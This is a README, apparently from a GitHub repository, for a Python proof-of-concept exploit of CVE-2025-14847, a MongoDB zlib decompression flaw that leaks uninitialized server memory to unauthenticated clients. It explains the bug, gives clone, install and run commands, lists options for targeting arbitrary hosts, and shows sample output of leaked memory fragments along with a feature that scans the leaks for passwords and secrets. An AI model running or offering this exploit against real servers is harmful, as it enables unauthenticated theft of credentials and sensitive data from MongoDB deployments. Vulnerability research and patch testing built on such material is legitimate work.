A proof‑of‑concept (PoC) exploit for the MongoDB zlib decompression vulnerability that allows unauthenticated attackers to read sensitive server memory.
The PoC is implemented in Python 3 and demonstrates how a malicious OP_COMPRESSED packet can trigger the bug, causing MongoDB to return uninitialized memory as BSON data.
The vulnerability is caused by a flaw in MongoDB’s zlib message decompression:
- A compressed message with an inflated
uncompressedSizeclaim is sent. - MongoDB allocates a large buffer based on that inflated value.
- zlib decompresses the actual data into the start of that buffer.
- MongoDB treats the entire buffer as valid data, leading to reading of uninitialized memory.
- BSON parsing then reads “field names” from that memory until a null byte is hit, exposing hidden data.
The PoC sends a crafted OP_COMPRESSED packet and parses the server’s error response to recover leaked data fragments.
| Component | Version | Notes |
|---|---|---|
| Python | ≥ 3.8 | The script is Python‑3 only |
| MongoDB | ≥ 4.4 | Target must be vulnerable to CVE‑2025‑14847 |
| Optional | requirements.txt |
Provided in the repo |
# Clone the repo (or copy the script)
git clone https://github.com/lincemorado97/CVE-2025-14847.git
cd cve-2025-14847
# (Optional) Install required Python packages
pip install -r requirements.txtpython exploit.py [OPTIONS]| Option | Default | Description |
|---|---|---|
--host |
localhost |
Target MongoDB host |
--port |
27017 |
Target MongoDB port |
--min-offset |
20 |
Minimum document length to probe |
--max-offset |
8192 |
Maximum document length to probe |
--output |
leaked.bin |
File where leaked data is saved |
Example:
python exploit.py --host 10.0.0.5 --port 27017 --min-offset 50 --max-offset 5000 --output leaks.bin$ python3 exploit.py
11:02:41 CVE-2025-14847 INFO │ [*] Target: localhost:27017
11:02:41 CVE-2025-14847 INFO │ [*] Scanning offsets 20-8192
11:02:41 CVE-2025-14847 INFO │ Offset Hex ASCII
11:02:41 CVE-2025-14847 INFO │ ---------------------------------------------------------------------------
11:02:41 CVE-2025-14847 INFO │ 00000000: 20 6f 62 6a 65 63 74 20 77 69 74 68 20 75 6e 6b | object with unk|
11:02:41 CVE-2025-14847 INFO │ 00000010: 6e 6f 77 6e 20 5f 69 64 |nown _id|
11:02:41 CVE-2025-14847 INFO │ [+] offset= 39 len= 24:
11:02:45 CVE-2025-14847 INFO │ Offset Hex ASCII
11:02:45 CVE-2025-14847 INFO │ ---------------------------------------------------------------------------
11:02:45 CVE-2025-14847 INFO │ 00000000: 73 20 73 6b 69 70 70 65 64 20 64 75 72 69 6e 67 |s skipped during|
11:02:45 CVE-2025-14847 INFO │ 00000010: 20 74 72 65 65 20 77 61 6c 6b | tree walk|
11:02:45 CVE-2025-14847 INFO │ [+] offset=3064 len= 26:
11:02:50 CVE-2025-14847 INFO │ Offset Hex ASCII
....
11:02:50 CVE-2025-14847 INFO │ [+] offset=6663 len= 38:
11:02:52 CVE-2025-14847 SUCCESS │ [*] Total leaked: 496 bytes
11:02:52 CVE-2025-14847 SUCCESS │ [*] Unique fragments: 85
11:02:52 CVE-2025-14847 SUCCESS │ [*] Saved to: leaked.binThe script will log each interesting fragment (length > 10 bytes) and output a hexdump view. All leaked data is appended to leaked.bin.
- Hexdump: Shows a subset of the leaked data in both hex and ASCII.
- Log lines:
[+] offset= <doc_len> len= <len>indicates where a fragment was found. - Total leaked: Bytes written to the output file.
- Unique fragments: Distinct data blocks detected.
- Secret detection: The script prints any of the predefined patterns (
password,secret, etc.) found in the leaked data.
- CVE-2025-14847 – https://nvd.nist.gov/vuln/detail/CVE-2025-14847
- Analysis: https://www.ox.security/blog/attackers-could-exploit-zlib-to-exfiltrate-data-cve-2025-14847/
This PoC is provided "as is" without any warranty. The author is not responsible for any misuse or damage caused by this script. Use it at your own risk.